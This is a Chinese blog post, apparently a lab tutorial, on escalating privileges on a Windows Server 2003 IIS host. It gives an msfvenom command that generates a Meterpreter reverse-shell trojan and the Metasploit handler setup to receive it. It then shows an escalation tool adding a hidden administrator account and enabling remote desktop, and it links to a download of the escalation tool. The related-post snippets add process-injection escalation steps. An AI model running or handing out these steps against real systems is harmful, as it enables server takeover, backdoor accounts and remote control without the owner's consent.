win2003提权(IIS中间件)

于 2024-04-09 18:18:40 发布
阅读量355 收藏 9
点赞数 5
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76206334/article/details/137523473
版权

工具链接:http://链接:https://pan.baidu.com/s/12Aa5atjsl38I59JDbETLzg 提取码:7kb5

我们在用菜刀链接到服务器(iis)时 通常会发现权限很低

kali木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=4444 -f exe -o hack.exe

木马在当前目录生成了

我们用iis中间件举例子    访问木马   然后用菜刀连接
连接成功后 我们打开虚拟终端  执行基本命令  发现权限不够
原因是iis中间件 可以访问的匿名用户如图所示(每个人的不一样)
而能执行操作系统cmd.exe用户里面  没有这个匿名用户  所以菜刀连接之后 就没权限
需要我们找一个同版本(2003)同位数(32位)的cmd.exe 上传到菜刀 通过命令切换成有权限的cmd     执行setp C:\wmpub\cmd.exe(路径)之所以选择这个目录  是因为这个目录有读写的权限
现在具有普通用户的权限了
接着我们进行下一步  将木马传到物理机桌面  然后在放到菜刀里面
然后我们打开kali    执行msfconsole   创建监听 
use exploit/multi/handler   #使用攻击模块

set payload windows/meterpreter/reverse_tcp  #设置反向代理

set LHOST 192.168.xxx.xxx    #设定本地ip监听  也就是kali本机ip

show options  #查看配置选项

有yes的地方是需要我们配置的

然后exploit 或者 run 

我们将目录切换后  直接执行hack.exe  然后看到shell反弹过来了

我们查看权限发现和菜刀一样 

尝试提权 第一种  直接用 getsystem命令

看到红色的部分就说明提权失败了

接着我们用我上面提供的提权工具  先把工具上传到菜刀目录

然后执行命令

 pr.exe "whoami" 

 pr.exe "net user 123  123 /add"   #创建用户

 pr.exe "net localgroup Administrators 123 /add"  #将创建用户添加到管理员组

查看当前用户

创建用户

添加进用户组

现在我们尝试打开对方的3389端口 然后进行远程桌面控制

输入刚建好的用户进行登录 登录成功

林子汐•
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
116.网络安全渗透测试—[权限提升篇14]—[Windows 2003 Metasploit提权&权限维持&开启3389]
qwsn
07-08 2533
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 【图略】#键入 启动 metasploit #进入监听模块 #查看系统信息 #查看进程 pid #迁移进程 #当前用户
windows server 2003 系统提权
08-09
windows server 2003 系统提权 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试; 对MS03_026漏洞开启远程桌面服务; 操作过程可自由发挥; 概念越详细越好; 渗透和验证过程必要有截图和文字说明; 其余部分均可配文字简介叙述; 作业模板在此基础上可以自由发挥设计; 熟悉虚拟机的使用,了解渗透测试工具的使用方法和Linux、DOS命令
win2003 提权
weixin_45676689的博客
10-11 502
win2003 提权 win2003 提权 ##实验环境 Win2003+vmware15 Win2003作为目标机,在物理机浏览器访问192.168.41.131,看是否能访问到iss下的文件 ##访问已经上传好了的大马,并登录进去 ##在大马中使用cmd命令,查看whoami,显示为低权限 ##使用systeminfo查看补丁信息 ##为了提权,在大马中向目标机的回收站中上传提权.exe软件 ...
提权_Windows 2003 进程注入提权
草木
11-22 1717
1.首先使用Process Injector进程注入工具,使用命令查看运行进程的PID pinjector.exe -l 这里我们注入进程services.exe,可以看到它是系统权限运行的进程,记住的它的PID:356 2.接着使用命令注入刚才记住的进程,监听端口设置为9988 pinjector.exe -p 356 cmd.exe 9988 3.最后我们使用 nc 监听本地9988的端口 使用命令 whoami 可以看到注入提权成功。 ...
【内网提权windows2003本地PR提权详解
weixin_45588247的博客
08-17 2489
提权利用的漏洞 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程,本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 BUGTRAQ ID: 34443 CVE(CAN) ID: CVE-2009-0079 发布日期:2009-04-14 更新日期.
2021-06-01web渗透学习之Windows2003提权
qq_45290991的博客
06-01 810
系统提权》作业 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试;对MS03_026漏洞开启远程桌面服务;操作过程可自由发挥;概念越详细越好;渗透和验证过程必要有截图和文字说明;其余部分均可配文字简介叙述;作业模板在此基础上可以自由发挥设计;熟悉虚拟机的使用,了解渗透测试工具的使用方法和Linu...
win2003 iis6 iis假死
09-30
缩短IIS应用池回收时间,减少IIS假死的解决方法
win2003提权工具
07-19
这个压缩包中的"win2003提权工具"很可能包含了一些用于系统权限提升的程序或脚本,如popup.dll和ImeUtil.exe,它们可能是提权过程中的关键组件。这些工具可能被系统管理员用于测试系统的安全性,或者在必要时提升...
Win2003 手机站IIS MIME类型设置大全
09-30
Windows Server 2003上的Internet Information Services (IIS) 是一个常见的Web服务器平台,用于托管各种类型的在线内容,包括手机软件的下载。在本文中,我们将深入探讨如何通过设置IIS的MIME类型来确保手机软件的...
Win2003下部署中间件平台
02-04
【导读】描述了Weblogic中间件是如何在Windows2003平台环境下安装部署的。中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源,中间件位于客户机服务器的操作系统之上,...
IIS全版本通杀提权工具
01-13
IIS全版本通杀提权工具,下载后,360会查杀,但是,亲测提权很有效
iis7提权工具iis7提权工具
06-10
iis7提权工具iis7提权工具iis7提权工具iis7提权工具iis7提权工具iis7提权工具
Windows2003系统漏洞提权复现
wangyuxiang946的博客
07-21 1万+
操作系统: Microsoft Windows Server 2003 Web服务器: IIS V6.0
112.网络安全渗透测试—[权限提升篇10]—[Windows 2003 LPK.DDL劫持提权&msf本地提权]
qwsn
07-06 2954
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! sethc.exe(sethc)是一个进程文件,按5下shift后,windows就执行system32下的sethc.exe,用来开启粘滞键。粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要作用是方便Shift与其他键的组合使用。 粘滞键可以先按一个键位,再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。 一般电脑连按五次shift会出现粘滞
[1]Windows IIS权限提权(一般aspx多一点)
司徒荆的博客
08-02 3252
Windows IIS权限提权(一般aspx多一点)
windows权限提升——windows2003进程注入提升(本地)
W小哥
12-03 4045
一、进程注入简介 进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在Windows2008之前操作系统上。所以我们需要学习后续的本地提权更多的手法才能针对高版本的系统。 版本: Windows2008之前 1.1 提权教程 演示环境:windows2003 1、将pinjector工具上传到目标服务器,运行以下命令 pinjector.exe       //运行命令,查看用法 pinjector.exe -l //列出可注入的进程 pin
提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
热门推荐
fendo
03-29 2万+
一、 二、Windwos常见提权
Windows 2003服务器提权:用户权限和文件夹权限
zyw_anquan的专栏
08-13 1万+
一、用户权限 详细讲解windows 2003服务器的默认用户权限,包括SYSTEM、Administrator、Guest、IUSR_*、IWAM_*。 详细介绍windows 2003服务器的默认用户组权限,包括Administrators、Backup Operators、Distributed COM Users、Guests、Network Configuration
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值